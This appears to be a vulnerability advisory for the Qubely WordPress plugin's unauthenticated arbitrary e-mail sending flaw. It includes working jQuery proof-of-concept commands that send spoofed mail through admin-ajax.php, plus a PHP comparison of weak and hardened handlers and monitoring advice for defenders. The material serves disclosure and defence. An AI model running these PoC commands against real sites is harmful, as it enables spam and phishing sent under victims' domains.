
wpexploit | Krzysztof Zając | WPEX-ID: 93B893BE-59AD-4500-8EDB-9FA7A45304D5
History: Jul 17, 2023 - 12:00 a.m.

Qubely < 1.8.6 - Unauthenticated Arbitrary E-mail Sending

2023-07-17 00:00:00
Krzysztof Zając
Tags: qubely, unauthenticated, email sending, exploit

EPSS: 0.001 (Low), Percentile: 32.7%

Description: The plugin allows unauthenticated users to send arbitrary e-mails to arbitrary addresses via the qubely_send_form_data AJAX action.

Execute the command below in the web developer console, on the blog homepage as an unauthenticated user, replacing DOMAIN with the domain of the blog:

Current PoC:

jQuery.post('/wp-admin/admin-ajax.php?action=qubely_send_form_data', { 'email-receiver': '[email protected]', 'email-subject': 'Unauthorised Email', 'email-from': 'xx:sender@DOMAIN', 'email-body':'Yolo', 'security': qubely_urls['nonce'] })

Pre-1.8.5 PoC:

jQuery.post('/wp-admin/admin-ajax.php?action=qubely_send_form_data', { 'email-receiver': btoa('[email protected]'), 'email-subject': btoa('Unauthorised Email'), 'email-from': btoa('xx:sender@DOMAIN'), 'email-body': btoa('Yolo') });
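The two PoCs show what changed between versions: the nonce added as the 'security' parameter is read from qubely_urls['nonce'], which the public page already exposes, so it does not restrict who can call the action, and the recipient still comes from the request. The following added example (not Qubely's code; the nonce action name, the meta key and the post_id field are assumed) contrasts that handler pattern with one that resolves the recipient server-side:

```php
<?php
// Hypothetical AJAX handlers for illustration, not the plugin's own code.

// Weak pattern: nonce present, but To/From/body all come from the request.
// A nonce printed into a public page only proves the request came from that
// page, not who sent it, so unauthenticated callers can mail anyone.
function weak_send_form_data() {
    check_ajax_referer( 'qubely_nonce', 'security' );   // assumed nonce action
    $to      = $_POST['email-receiver'];
    $subject = $_POST['email-subject'];
    $body    = $_POST['email-body'];
    $headers = 'From: ' . $_POST['email-from'];          // header injection surface
    wp_mail( $to, $subject, $body, $headers );
    wp_send_json_success();
}

// Hardened pattern: recipient and sender are fixed server-side from stored
// form settings, nothing request-controlled reaches the mail headers.
function hardened_send_form_data() {
    check_ajax_referer( 'qubely_nonce', 'security' );
    $post_id = absint( $_POST['post_id'] ?? 0 );        // assumed field
    $to      = get_post_meta( $post_id, '_form_recipient', true ); // assumed meta key
    if ( ! is_email( $to ) ) {
        wp_send_json_error( 'no recipient configured for this form', 400 );
    }
    $subject = sanitize_text_field( wp_unslash( $_POST['email-subject'] ?? '' ) );
    $body    = sanitize_textarea_field( wp_unslash( $_POST['email-body'] ?? '' ) );
    // Strip line breaks so the subject cannot smuggle extra headers.
    $subject = str_replace( array( "\r", "\n" ), ' ', $subject );
    $headers = array( 'From: ' . get_option( 'admin_email' ) );
    wp_mail( $to, $subject, $body, $headers );
    wp_send_json_success();
}

// Both logged-in and anonymous visitors reach the same hardened handler.
add_action( 'wp_ajax_qubely_send_form_data', 'hardened_send_form_data' );
add_action( 'wp_ajax_nopriv_qubely_send_form_data', 'hardened_send_form_data' );
```

For monitoring, POST requests to admin-ajax.php with action=qubely_send_form_data from sessions that never authenticated are the signal to alert on until the site runs 1.8.6 or later.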

